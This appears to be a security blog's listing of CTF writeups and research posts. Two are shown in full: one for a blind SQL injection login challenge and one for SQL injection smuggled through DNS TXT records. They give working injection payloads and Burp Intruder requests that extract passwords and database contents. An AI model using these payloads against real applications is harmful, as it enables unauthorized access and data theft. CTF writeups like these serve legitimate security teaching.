PlaidCTF writeup for Pwn-275 – Kappa (type confusion vuln)

Hey folks,

This is my last writeup for PlaidCTF! You can get a list of all my writeups here. Kappa is a 275-point pwnable level called Kappa, and the goal is to capture a bunch of Pokemon and make them battle each other!

Ultimately, this issue came down to a type-confusion bug that let us read memory and call arbitrary locations. Let's see why!
Continue reading

PlaidCTF writeup for Web-100 – PolygonShifter (blind sql injection)

Hey folks,

I know in my last blog I promised to do a couple exploit ones instead of doing boring Web stuff. But, this level was really easy and I still wanted to do a writeup, so you're just going to have to wait a little while longer for my 'kappa' writeup!

This 100-point Web challenge, called PolygonShifter, basically added some anti-bot defenses to a Web site by obfuscating the username/password field names, as well as the action for the POST request. When you visited the page, you'd see something like this:

<form action="/S1tl90gme2GJ67epbZz9" method="POST">
    <label for="" style="text-align:left;">Username</label>
    <input type="text" id="lK1TFqrcp3fvIRSg8V7T" name="L1UIVbxzFD8wUUo8SaJH">
    <label for="LkW7Ye9ItPb8CGeKZrMU" style="text-align:left;">Password</label>
    <input type="password" id="LkW7Ye9ItPb8CGeKZrMU" name="LmmURBa3S5NRYBwzHXhC">
    <input class="primary large" type="submit" value="Login">
</form>

I immediately installed the 'httparty' gem and started writing a solution in ruby, when I had an inspiration. I tried using the same action multiple times, and it worked! It would only work for a few minutes before I had to refresh and get a new one. But, that was enough!

I decided—incorrectly—that this was likely a brute-force level, so I fired up Burp Suite, chose 'Intruder' mode, and set it to something like:

POST /im6Kh1pOKr7Y9bbDHiew HTTP/1.0
Host: 54.204.80.192
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://54.204.80.192/example
Cookie: resolution=1920; session=.eJxdzc0OwTAAAOBXkZ4dSkJC4kDaSYSOTruuF2nXonSz2GR-4t2JC_YAX74HUGnlTvlm66w3YPgALQ2GQMWwG3V31xQP5unByDCeOYr3hRTpCDzboFBlWZ_OpsFoRpSZBlLGsI4wqw3yjvEAccz-mfuapEMEQZNQI3-LkS8iQW5RzvtruPiYS2nPucpso7JHWoXBqrPwFGvEe5r7jN2JVIj9s5_KwCpZ-TEMp2RP2ZXqO1laQZ0Wyds8Xxv7V7E.Bix5uQ.vhQP7hI43dgozvUAVyBF7MM6C9E
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

zDm8T52TDl5ymYfS3Yh5=admin&FcZtaYem0HE0t9bQQCTE=§password§

Then I used Burp Suite's built-in list of passwords to attack the account.

I let the attack run through the ~1000 or so passwords, then added a filter for 'Hello, ' (in order to find good attempts). There weren't any. Damnit, now I need a new plan!

...then, on a random inspiration, I tried an invert search for 'Wrong password'. And there was one entry: a password containing a single quote returned "An error occurred" instead of "Wrong password". *facepalm*, it's sql injection!

So, I tried logging in with:

  • Username :: admin
  • Password :: ' or 1=1--

And immediately, I'm logged in... as 'test'. Derp!

So I changed my credentials to:

  • Username :: admin
  • Password :: ' or username='admin'--

(Don't forget to put a space after the '--' if you're following along!)

And boom! I'm logged in as 'admin'! Finished, right? WRONG! The banner says: "Hello, admin!! My password is the flag!"

Now, it sounds like I need to recover admin's password. CHALLENGE. ACCEPTED.

I threw together a quick Burp Suite Intruder attack that looked like:

POST /im6Kh1pOKr7Y9bbDHiew HTTP/1.0
Host: 54.204.80.192
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://54.204.80.192/example
Cookie: resolution=1920; session=.eJxdzc0OwTAAAOBXkZ4dSkJC4kDaSYSOTruuF2nXonSz2GR-4t2JC_YAX74HUGnlTvlm66w3YPgALQ2GQMWwG3V31xQP5unByDCeOYr3hRTpCDzboFBlWZ_OpsFoRpSZBlLGsI4wqw3yjvEAccz-mfuapEMEQZNQI3-LkS8iQW5RzvtruPiYS2nPucpso7JHWoXBqrPwFGvEe5r7jN2JVIj9s5_KwCpZ-TEMp2RP2ZXqO1laQZ0Wyds8Xxv7V7E.Bix5uQ.vhQP7hI43dgozvUAVyBF7MM6C9E
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

zDm8T52TDl5ymYfS3Yh5=admin&FcZtaYem0HE0t9bQQCTE=%27+or+%28username%3D%27admin%27+and+binary+substring%28password%2C+§1§%2C+1%29+%3D+%27§a§%27%29--+

To clean it up, it's basically:

  • Username :: admin
  • Password :: ' or (username='admin' and binary substring(password, $1, 1) = '$2')

(Where $1 and $2 are Burp Suite's marked fields)

Then I set Burp Suite to use a 'Cluster Bomb' style of attack, which means that each field has its own set of values that are tried. Then I set the two variables to:

  • $1 :: numeric, 1 - 45 (I had to keep expanding this since the password was 30+ characters long!)
  • $2 :: custom set, a-z A-Z 0-9 + symbols

Then I let it run, filtered for 'Hello', and got the following results:

Boom! Arrange those properly and you have your password. :)

PlaidCTF writeup for Pwn-200 (a simple overflow bug)

I know what you're thinking of: what's with all the Web levels!?

Well, I was saving the exploitation levels for last! This post will be about Pwnable-200 (ezhp), and the next one will be Pwnable-275 (kappa). You can get the binary for ezhp here, and I highly recommend poking at this if you're interested in exploitation—it's actually one of the easiest exploitation levels you'll find!
Continue reading

PlaidCTF writeup for Web-300 – whatscat (SQL Injection via DNS)

Hey folks,

This is my writeup for Whatscat, just about the easiest 300-point Web level I've ever solved! I wouldn't normally do a writeup about a level like this, but much like the mtpox level I actually wrote the exact tool for exploiting this, and even wrote a blog post about it almost exactly 4 years ago - April of 2010. Unlike mtpox, this tool isn't the least bit popular, but it sure made my life easy!

The set up

Whatscat is a php application where people can post photos of cats and comment on them (Here's a copy of the source).

The vulnerable code is in the password-reset code, in login.php, which looks like this:

  elseif (isset($_POST["reset"])) {
    $q = mysql_query(sprintf("select username,email,id from users where username='%s'",
      mysql_real_escape_string($_POST["name"])));
    $res = mysql_fetch_object($q);
    $pwnew = "cat".bin2hex(openssl_random_pseudo_bytes(8));
    if ($res) {
      echo sprintf("<p>Don't worry %s, we're emailing you a new password at %s</p>",
        $res->username,$res->email);
      echo sprintf("<p>If you are not %s, we'll tell them something fishy is going on!</p>",
        $res->username);
$message = <<<CAT
Hello. Either you or someone pretending to be you attempted to reset your password.
Anyway, we set your new password to $pwnew

If it wasn't you who changed your password, we have logged their IP information as follows:
CAT;
      $details = gethostbyaddr($_SERVER['REMOTE_ADDR']).
        print_r(dns_get_record(gethostbyaddr($_SERVER['REMOTE_ADDR'])),true);
      mail($res->email,"whatscat password reset",$message.$details,"From: whatscat@whatscat.cat\r\n");
      mysql_query(sprintf("update users set password='%s', resetinfo='%s' where username='%s'",
              $pwnew,$details,$res->username));
    }
    else {
      echo "Hmm we don't seem to have anyone signed up by that name";
    }

Specifically, these lines:

      $details = gethostbyaddr($_SERVER['REMOTE_ADDR']).
        print_r(dns_get_record(gethostbyaddr($_SERVER['REMOTE_ADDR'])),true);
      mail($res->email,"whatscat password reset",$message.$details,"From: whatscat@whatscat.cat\r\n");
      mysql_query(sprintf("update users set password='%s', resetinfo='%s' where username='%s'",
              $pwnew,$details,$res->username));

The $details variable is being inserted into the database unescaped. I've noted in the past that people trust DNS results just a bit too much, and this is a great example of that mistake! If we can inject SQL code into a DNS request, we're set!

...this is where I wasted a lot of time, because I didn't notice that the print_r() is actually part of the same statement as the line before it - I thought only the reverse DNS entry was being put into the database. As such, my friend Mak—who was working on this level first—tried to find a way to change the PTR record, and broke all kinds of SkullSpace infrastructure as a result.

I ended up trying to log in as 'admin'/'password', and, of course, failed. On a hunch, I hit 'forgot password' for admin. That sent me to a Mailinator-like service. I logged into the mailbox, and noticed somebody trying to sql inject using TXT records. This wasn't an actual admin—like I thought it was—it was another player who just gave me a huge hint (hooray for disposable mail services!). Good fortune!

Knowing that a TXT record would work, it actually came in handy that Mak controls the PTR records for all SkullSpace ip addresses. He could do something useful instead of breaking stuff! The server I use for blogs (/me waves) and such is on the SkullSpace network, so I got him to set the PTR record to test.skullseclabs.org. In fact, if you do a reverse lookup for '206.220.196.59' right now, you'll still see that:

$ host blog.skullsecurity.org
blog.skullsecurity.org is an alias for skullsecurity.org.
skullsecurity.org has address 206.220.196.59
$ host 206.220.196.59
59.196.220.206.in-addr.arpa domain name pointer test.skullseclabs.org.

I control the authoritative server for test.skullseclabs.org—that's why it exists—so I can make it say anything I want for any record. It's great fun! Though arguably overkill for this level, at least I didn't have to flip to my registrar's page every time I wanted to change a record; instead, I can do it quickly using a tool I wrote called dnsxss. Here's an example:

$ sudo ./dnsxss --payload="Hello yes this is test"
Listening for requests on 0.0.0.0:53
Will response to queries with: Hello/yes/this/is/test

$ dig -t txt test123.skullseclabs.org
[...]
;; ANSWER SECTION:
test123.skullseclabs.org. 1     IN      TXT     "Hello yes this is test.test123.skullseclabs.org"

All I had to do was find the right payload!

The exploit

I'm not a fan of working blind, so I made my own version of this service locally, and turned on SQL errors. Then I got to work constructing an exploit! It was an UPDATE statement, so I couldn't directly exploit this - I could only read indirectly by altering my email address (as you'll see). I also couldn't figure out how to properly terminate the sql string (neither '#' nor '-- ' nor ';' properly terminated due to brackets). In the end, my payload would:

  • Tack on an extra clause to the UPDATE that would set the 'email' field to another value
  • Read properly right to the end, which means ending the query with "resetinfo='", so the "resetinfo" field gets set to all the remaining crap

So, let's give this a shot!

./dnsxss --payload="test', email='test1234', resetinfo='"

Then I create an account, reset the password from my ip address, and refresh. The full query—dumped from my test server—looks like:

update users set password='catf7a252e008616c94', resetinfo='test.skullseclabs.orgArray ( [0] => Array ( [host] => test.skullseclabs.org [class] => IN [ttl] => 1 [type] => TXT [txt] => test', email='test1234', resetinfo='.test.skullseclabs.org [entries] => Array ( [0] => test', email='test1234', resetinfo=' ) ) ) ' where username='ron'

As you can see, that's quite a mess (note that the injected stuff appears twice.. super annoying). After that runs, the reset-password page looks like:

Don't worry ron, we're emailing you a new password at test1234

If you are not ron, we'll tell them something fishy is going on!

Sweet! I successfully changed my password!

But... what am I looking for?

MySQL has this super handy database called information_schema, which contains tables called 'SCHEMATA', 'TABLES', and 'COLUMNS', and it's usually available for anybody to inspect. Let's dump SCHEMATA.SCHEMA_NAME from everything:

./dnsxss --payload="test', email=(select group_concat(SCHEMA_NAME separator ', ') from information_schema.SCHEMATA), resetinfo='"

Then refresh a couple times to find:

Don't worry ron, we're emailing you a new password at information_schema, mysql, performance_schema, whatscat

If you are not ron, we'll tell them something fishy is going on!

Great! Three of those are built-in databases, but 'whatscat' looks interesting. Now let's get table names from whatscat:

./dnsxss --payload="test', email=(select group_concat(TABLE_NAME separator ', ') from information_schema.TABLES where TABLE_SCHEMA='whatscat'), resetinfo='"

Leads to:

Don't worry ron, we're emailing you a new password at comments, flag, pictures, users

If you are not ron, we'll tell them something fishy is going on!

flag! Sweet! That's a pretty awesome looking table! Now we're one simple step away... what columns does 'flag' contain?

./dnsxss --payload="test', email=(select group_concat(COLUMN_NAME separator ', ') from information_schema.COLUMNS where TABLE_NAME='flag'), resetinfo='"

Leads to:

Don't worry ron, we're emailing you a new password at flag

If you are not ron, we'll tell them something fishy is going on!

All right, we know the flag is in whatscat.flag.flag, so we write one final query:

./dnsxss --payload="test', email=(select group_concat(flag separator ', ') from whatscat.flag), resetinfo='"

Which gives us:

Don't worry ron, we're emailing you a new password at 20billion_d0llar_1d3a

If you are not ron, we'll tell them something fishy is going on!

And now we dance.

Conclusion

If you're interested in DNS attacks—this scenario and a whole bunch of others—come see my talk at BSidesQuebec this June!!!

PlaidCTF writeup for Web-200 – kpop (bad deserialization)

Hello again!

This is my second writeup from PlaidCTF this past weekend! It's for the Web level called kpop, and is about how to shoot yourself in the foot by misusing serialization (download the files). There are at least three levels I either solved or worked on that involved serialization attacks (mtpox, reeekeeeeee, and this one), which is awesome because this is a seriously undersung attack. Good on the PPP!
Continue reading

PlaidCTF writeup for Web-150 – mtpox (hash extension attack)

Hey folks,

This is going to be my first of a couple writeups about this past weekend's CTF: PlaidCTF!

My first writeup is for a 150-point Web level called mtpox. I chose this one to do first not only because it's the first level I completed, but also because the primary vulnerability was a hash extension issue, and I wrote one of most popular tools for exploiting those. So it's like the level made for me!

(Actually, there's another level that I wrote a less popular tool for. I'll talk about that one in my next post. :) )
Continue reading

Ghost in the Shellcode: fuzzy (Pwnage 301)

Hey folks,

It's a little bit late coming, but this is my writeup for the Fuzzy level from the Ghost in the Shellcode 2014 CTF! I kept putting off writing this, to the point where it became hard to just sit down and do it. But I really wanted to finish before PlaidCTF 2014, which is this weekend so here we are! You can see my other two writeups here (TI-1337) and here (gitsmsg).

Like my other writeups, this is a "pwnage" level, and required the user to own a remote server. Unfortunately, because of my slowness, they're no longer running the server, but you can get a copy of the binary at my github page and run it yourself. It's a 64-bit Linux ELF executable. It didn't have ASLR, and DEP would have been
Continue reading

Ghost in the Shellcode: gitsmsg (Pwnage 299)

"It's Saturday night; I have no date, a 2L bottle of Shasta, and my all-rush mix tape. Let's rock!"

...that's what I said before I started gitsmsg. I then entered "Rush" into Pandora, and listened to a mix of Rush, Kansas, Queen, Billy Idol, and other 80's rock for the entire level. True story.

Anyway, let's get on with it! Not too long ago I posted my writeup for the 100-level "Pwnage" challenge from Ghost in the Shellcode. Now, it's time to get a little more advanced and talk about the 299-level challenge: gitsmsg. Solved by only 11 teams, this was considerably more challenging.

As before, you can obtain the binary, my annotated IDA database, and exploit code on my Github page
Continue reading

Ghost in the Shellcode: TI-1337 (Pwnable 100)

Hey everybody,

This past weekend was Shmoocon, and you know what that means—Ghost in the Shellcode!

Most years I go to Shmoocon, but this year I couldn't attend, so I did the next best thing: competed in Ghost in the Shellcode! This year, our rag-tag band of misfits—that is, the team who purposely decided not to ever decide on a team name, mainly to avoid getting competitive—managed to get 20th place out of at least 300 scoring teams!

I personally solved three levels: TI-1337, gitsmsg, and fuzzy. This is the first of three writeups, for the easiest of the three: TI-1337—solved by 44 teams.

You can download the binary, as well as the exploit, the IDA Pro files, and everything else worth keeping that I generated, from my Github repository.
Continue reading

In-depth malware: Unpacking the ‘lcmw’ Trojan

Hey folks,

Happy New Year, and welcome to 2014!

On a recent trip to Tyson's Corner, VA, I had some time to kill, so I took a careful look at a malware sample that a friend of mine sent to me some time ago, which I believe he originally got off somebody else's hosed system. The plan was for me to investigate it, and I promised him I would; it just took awhile!

Anyways, the sample has a few layers of packing, and I thought it'd be fun/interesting to show you how to unwrap the entire thing to obtain the final payload. I am not going to discuss the payload itself in this post, largely because I haven't spent much time reversing it. Perhaps in the future I'll dig a little deeper, but for now we'll focus on the packing.

I called this sample "lcmw". It stood for something interesting, but I don't really remember what—I may have been drinking when I named it. :)
Continue reading

BSides Winnipeg Wrap-up

For those of you who are close to me, you'll know that my life has been crazy lately. Between teaching courses, changing jobs (here I come, Google!recently started at Google! (I'm slow at posting these :) )), and organizing BSides Winnipeg, I've barely had time to breathe!

Things are still chaotic, of course (in fact, movers were packing up my life as I wrote this), but I wanted to take some time and talk about BSides Winnipeg.

I'll go over the background, the planning, the day-of, and some lessons learned. If you just want to see cool photos, here you go!

Continue reading

ropasaurusrex: a primer on return-oriented programming

One of the worst feelings when playing a capture-the-flag challenge is the hindsight problem. You spend a few hours on a level—nothing like the amount of time I spent on cnot, not by a fraction—and realize that it was actually pretty easy. But also a brainfuck. That's what ROP's all about, after all!

Anyway, even though I spent a lot of time working on the wrong solution (specifically, I didn't think to bypass ASLR for quite awhile), the process we took of completing the level first without, then with ASLR, is actually a good way to show it, so I'll take the same route on this post.

Before I say anything else, I have to thank HikingPete for being my wingman on this one. Thanks to him, we solved this puzzle much more quickly and, for a short time, were in 3rd place worldwide!
Continue reading

Epic “cnot” Writeup (highest value level from PlaidCTF)

When I was at Shmoocon, I saw a talk about how to write an effective capture-the-flag contest. One of their suggestions was to have a tar-pit challenge that would waste all the time of the best player, by giving him a complicated challenge he won't be able to resist. In my opinion, in PlaidCTF, I suspected that "cnot" was that challenge. And I was the sucker, even though I knew it all the way...

(It turns out, after reviewing writeups of other challenges, that most of the challenges were like this; even so, I'm proud to have been sucked in!)

If you want a writeup where you can learn something, I plan to post a writeup for "Ropasaurus" in the next day or two. If you want a writeup about me being tortured as I fought through inconceivable horrors to finish a level and capture the bloody flag, read on! This level wasn't a lot of learning, just brute-force persistence.
Continue reading

A padding oracle example

Early last week, I posted a blog about padding oracle attacks. I explained them in detail, as simply as I could (without making diagrams, I suck at diagrams). I asked on Reddit about how I could make it easier to understand, and JoseJimeniz suggested working through an example. I thought that was a neat idea, and working through a padding oracle attack by hand seems like a fun exercise!

(Having done it already and writing this introduction afterwards, I can assure you that it isn't as fun as I thought it'd be :) )

I'm going to assume that you've read my previous blog all the way through, and jump right into things!
Continue reading

Padding oracle attacks: in depth

This post is about padding oracle vulnerabilities and the tool for attacking them - "Poracle" I'm officially releasing right now. You can grab the Poracle tool on Github!

At my previous job — Tenable Network Security — one of the first tasks I ever had was to write a vulnerability check for MS10-070 — a padding oracle vulnerability in ASP.net. It's an interesting use of a padding oracle vulnerability, since it leads to code execution, but this blog is going to be a more general overview of padding oracles. When I needed to test this vuln, I couldn't find a good writeup on how they work. The descriptions I did find were very technical and academic, which I'm no good at. In fact, when it comes to reading academic papers, I'm clueless and easily frightened. But, I struggled through them, and now I'm gonna give you a writeup that even I'd be able to understand!

By the way, the Wikipedia page for this attack isn't very good. If somebody wants to summarize my blog and make it into a Wikipedia page, there's now a source you can reference. :)

On a related note, I'm gonna be speaking at Shmoocon in February: "Crypto: You're doing it wrong". Among other things, I plan to talk about padding oracles and hash extension attacks — I'm really getting into this crypto thing!
Continue reading

What’s going on with SkullSpace (our hackerspace)?

Hey everybody,

This is just a super quick post today to direct you here - http://www.skullspace.ca/blog/2012/11/skullspace-2-0-the-new-frontier/.

That's a post I wrote about SkullSpace - the hackerspace that me and several others helped found a couple years ago. We went down a "too good to be true" road, where we had a ton of space and super cheap rent. And, eventually, got bitten by it. We're in the process of moving, and started a fundraiser to make it happen.

Anyway, read the post! It's interesting. :)

Ron
Continue reading

Everything you need to know about hash length extension attacks

You can grab the hash_extender tool on Github!

(Administrative note: I'm no longer at Tenable! I left on good terms, and now I'm a consultant at Leviathan Security Group. Feel free to contact me if you need more information!)

Awhile back, my friend @mogigoma and I were doing a capture-the-flag contest at https://stripe-ctf.com. One of the levels of the contest required us to perform a hash length extension attack. I had never even heard of the attack at the time, and after some reading I realized that not only is it a super cool (and conceptually easy!) attack to perform, there is also a total lack of good tools for performing said attack! After hours of adding the wrong number of null bytes or incorrectly adding length values, I vowed to write a tool to make this easy for myself and anybody else who's trying to do it. So, after a couple weeks of work, here it is!

Continue reading

Using “Git Clone” to get Pwn3D

Hey everybody!

While I was doing a pentest last month, I discovered an attack I didn't previously know, and I thought I'd share it. This may be a Christopher Columbus moment - discovering something that millions of people already knew about - but I found it pretty cool so now you get to hear about it!

One of the first things I do when I'm looking at a Web app - and it's okay to make a lot of noise - is run the http-enum.nse Nmap script. This script uses the http-fingerprints.lua file to find any common folders on a system (basically brute-force browsing). I'm used to seeing admin folders, tmp folders, and all kinds of other interesting stuff, but one folder in particular caught my eye this time - /.git.
Continue reading

Battle.net authentication misconceptions

Hey everybody,

There have been a lot of discussion and misconceptions about Battle.net's authentication lately. Having done a lot of work on the Battle.net protocol, I wanted to lay some to rest.

The first thing to understand is that, at least at the time I was working on this, there were three different login methods (this is before they combined the Web logins with Battle.net logins - I can't speak on those). The three methods are:

  1. CHAT protocol - deprecated a long, long time ago
  2. Old Login System (OLS) - used by Diablo, Warcraft 2 BNE, Starcraft, and Diablo II
  3. New Login System (NLS) - used by Warcraft 3, World of Warcraft, and in some fashion by newer games. Also supported - but unused - by Diablo II

I'll describe, in detail, how each of these work. The summary is, though, that at no point does a game client ever send a plaintext password to the server. The closest is the SHA1 of the password, which is used for account creation in old games. For more information, read on!
Continue reading

Remote control manager FAIL

Hey guys,

Today, I thought it'd be fun to take a good look at a serious flaw in some computer-management software. Basically, the software is designed for remotely controlling systems on networks (for installing updates or whatever). As far as I know, this vulnerability is currently unpatched; there are allegedly mitigations, but you have to pay to see them! (A note to vendors - making us pay for your patches or mitigation notes only makes your customers less secure. Please stop doing that!)

This research was done in the course of my work at Tenable Network Security on the Reverse Engineering team. It's an awesome team to work on, and we're always hiring (for this team and others)! If you're interested and you have mad reverse engineering skillz, or any kind of infosec skillz, get in touch with me privately! (rbowes-at-tenable-dot-com if you're interested in applying)
Continue reading